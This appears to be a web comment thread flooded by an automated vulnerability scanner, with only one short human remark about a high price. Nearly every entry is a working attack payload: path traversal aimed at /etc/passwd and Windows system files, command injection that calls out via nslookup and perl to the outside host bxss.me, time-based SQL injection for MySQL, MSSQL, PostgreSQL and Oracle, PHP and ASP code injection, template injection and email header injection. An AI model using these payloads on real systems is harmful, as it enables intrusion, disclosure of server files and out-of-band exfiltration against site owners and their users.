../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
(nslookup hitptyvktohcb7d5ad.bxss.me||perl -e "gethostbyname('hitptyvktohcb7d5ad.bxss.me')")
re: Just_Ingest
)
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
$(nslookup hitjepojkxcsu0d8a5.bxss.me||perl -e "gethostbyname('hitjepojkxcsu0d8a5.bxss.me')")
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
&nslookup hitfgbijlcfvb54817.bxss.me&'\"`0&nslookup hitfgbijlcfvb54817.bxss.me&`'
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
&(nslookup hitisaunnbhnm3644e.bxss.me||perl -e "gethostbyname('hitisaunnbhnm3644e.bxss.me')")&'\"`0&(nslookup hitisaunnbhnm3644e.bxss.me||perl -e "gethostbyname('hitisaunnbhnm3644e.bxss.me')")&`'
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
|(nslookup hitbwkgmyvbrqa997f.bxss.me||perl -e "gethostbyname('hitbwkgmyvbrqa997f.bxss.me')")
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
`(nslookup hitnifwrddnkib69aa.bxss.me||perl -e "gethostbyname('hitnifwrddnkib69aa.bxss.me')")`
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
;(nslookup hitdwuaerhpzrb31e9.bxss.me||perl -e "gethostbyname('hitdwuaerhpzrb31e9.bxss.me')")|(nslookup hitdwuaerhpzrb31e9.bxss.me||perl -e "gethostbyname('hitdwuaerhpzrb31e9.bxss.me')")&(nslookup hitdwuaerhpzrb31e9.bxss.me||perl -e "gethostbyname('hitdwuaerhpzrb31e9.bxss.me')")
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
/etc/shells
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
'.gethostbyname(lc('hitru'.'vmjigtaf3f633.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(103).chr(85).'
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
".gethostbyname(lc("hitrb"."gvbxzpnh951a0.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(72).chr(119).chr(71)."
re: Just_Ingest
bxss.me
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(112).concat(78).concat(100).concat(87)+(require"socket"
Socket.gethostbyname("hithr"+"vyzhxvocf38f5.bxss.me.")[3].to_s)+"
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(102).concat(77).concat(110).concat(69)+(require'socket'
Socket.gethostbyname('hittg'+'tweyfgql2a6f8.bxss.me.')[3].to_s)+'
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
'"
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
<!--
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
1
re: Just_Ingest
1
re: Just_Ingest
-1 OR 2+411-411-1=0+0+0+1 --
re: Just_Ingest
-1 OR 3+411-411-1=0+0+0+1 --
re: Just_Ingest
-1 OR 2+192-192-1=0+0+0+1
re: Just_Ingest
-1 OR 3+192-192-1=0+0+0+1
re: Just_Ingest
-1' OR 2+375-375-1=0+0+0+1 --
re: Just_Ingest
-1' OR 3+375-375-1=0+0+0+1 --
re: Just_Ingest
-1' OR 2+825-825-1=0+0+0+1 or 'IKFHVje1'='
re: Just_Ingest
-1' OR 3+825-825-1=0+0+0+1 or 'IKFHVje1'='
re: Just_Ingest
-1" OR 2+175-175-1=0+0+0+1 --
re: Just_Ingest
-1" OR 3+175-175-1=0+0+0+1 --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
ltksSLWi'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 906=(SELECT 906 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 378=(SELECT 378 FROM PG_SLEEP(15))--
re: Just_Ingest
EFPmfnfR' OR 256=(SELECT 256 FROM PG_SLEEP(15))--
re: Just_Ingest
Tfu4g2Ys') OR 823=(SELECT 823 FROM PG_SLEEP(15))--
re: Just_Ingest
cbuK8KB5')) OR 645=(SELECT 645 FROM PG_SLEEP(15))--
re: Just_Ingest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@9a3kA
Justin, thanks! But oh wow the price is just through the roof.
re: guest
4Kwjodbj
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+217-217-1=0+0+0+1
re: guest
-1 OR 3+217-217-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
pet2zEgT'; waitfor delay '0:0:15' --
re: guest
-5 OR 116=(SELECT 116 FROM PG_SLEEP(15))--
re: guest
cfsWIqkg
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+179-179-1=0+0+0+1
re: guest
-1 OR 3+179-179-1=0+0+0+1
re: guest
-5) OR 817=(SELECT 817 FROM PG_SLEEP(15))--
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
-1)) OR 702=(SELECT 702 FROM PG_SLEEP(15))--
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
sYTM47Wt' OR 427=(SELECT 427 FROM PG_SLEEP(15))--
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
dN1STiOA') OR 200=(SELECT 200 FROM PG_SLEEP(15))--
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
3ZBOb4Yg')) OR 260=(SELECT 260 FROM PG_SLEEP(15))--
re: guest
-1; waitfor delay '0:0:15' --
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
-1); waitfor delay '0:0:15' --
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
1 waitfor delay '0:0:15' --
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
cmd5jpO4'; waitfor delay '0:0:15' --
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
-5 OR 902=(SELECT 902 FROM PG_SLEEP(15))--
re: guest
@@wWgbp
re: guest
-5) OR 711=(SELECT 711 FROM PG_SLEEP(15))--
re: guest
-1)) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: guest
LyGsLuuX' OR 174=(SELECT 174 FROM PG_SLEEP(15))--
re: guest
z3YQIkES') OR 159=(SELECT 159 FROM PG_SLEEP(15))--
re: guest
t31o8Pwy')) OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@aEinh
re: guest
1fLnIp0VO
re: guest
response.write(9461943*9030238)
re: guest
'+response.write(9461943*9030238)+'
re: guest
"+response.write(9461943*9030238)+"
re: guest
%0abcc:074625.67-14532.67.11875.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-14533.67.11875.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
${9999758+10000211}
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
/etc/passwd
re: guest
echo lczzrl$()\ bteuub\nz^xyu||a #' &echo lczzrl$()\ bteuub\nz^xyu||a #|" &echo lczzrl$()\ bteuub\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo vcccuv$()\ ptupwl\nz^xyu||a #' &echo vcccuv$()\ ptupwl\nz^xyu||a #|" &echo vcccuv$()\ ptupwl\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo nafxqn$()\ twgdwm\nz^xyu||a #' |echo nafxqn$()\ twgdwm\nz^xyu||a #|" |echo nafxqn$()\ twgdwm\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitnayhiczsalf0511.bxss.me||perl -e "gethostbyname('hitnayhiczsalf0511.bxss.me')")
re: guest
)
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hithicitikhrv57148.bxss.me||perl -e "gethostbyname('hithicitikhrv57148.bxss.me')")
re: guest
!(()&&!|*|*|
re: guest
&nslookup hitjyiqhufynp59772.bxss.me&'\"`0&nslookup hitjyiqhufynp59772.bxss.me&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
&(nslookup hitlpjqznocac18894.bxss.me||perl -e "gethostbyname('hitlpjqznocac18894.bxss.me')")&'\"`0&(nslookup hitlpjqznocac18894.bxss.me||perl -e "gethostbyname('hitlpjqznocac18894.bxss.me')")&`'
re: guest
file:///etc/passwd
re: guest
|(nslookup hitcwsqdzonwt8b220.bxss.me||perl -e "gethostbyname('hitcwsqdzonwt8b220.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
`(nslookup hitjieyxkwutqd4bdf.bxss.me||perl -e "gethostbyname('hitjieyxkwutqd4bdf.bxss.me')")`
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
/WEB-INF/web.xml
re: guest
;(nslookup hitsqwyvkrqep2394c.bxss.me||perl -e "gethostbyname('hitsqwyvkrqep2394c.bxss.me')")|(nslookup hitsqwyvkrqep2394c.bxss.me||perl -e "gethostbyname('hitsqwyvkrqep2394c.bxss.me')")&(nslookup hitsqwyvkrqep2394c.bxss.me||perl -e "gethostbyname('hitsqwyvkrqep2394c.bxss.me')")
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
'.gethostbyname(lc('hitqs'.'yzmisdcq09796.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(82).chr(113).chr(79).'
re: guest
Http://bxss.me/t/fit.txt
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
".gethostbyname(lc("hityp"."npfzgjol9ce9b.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(65).chr(111).chr(84)."
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
/etc/shells
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
c:/windows/win.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
bxss.me
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
"+"A".concat(70-3).concat(22*4).concat(117).concat(73).concat(106).concat(84)+(require"socket"
Socket.gethostbyname("hitdo"+"chvztxvy68f55.bxss.me.")[3].to_s)+"
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.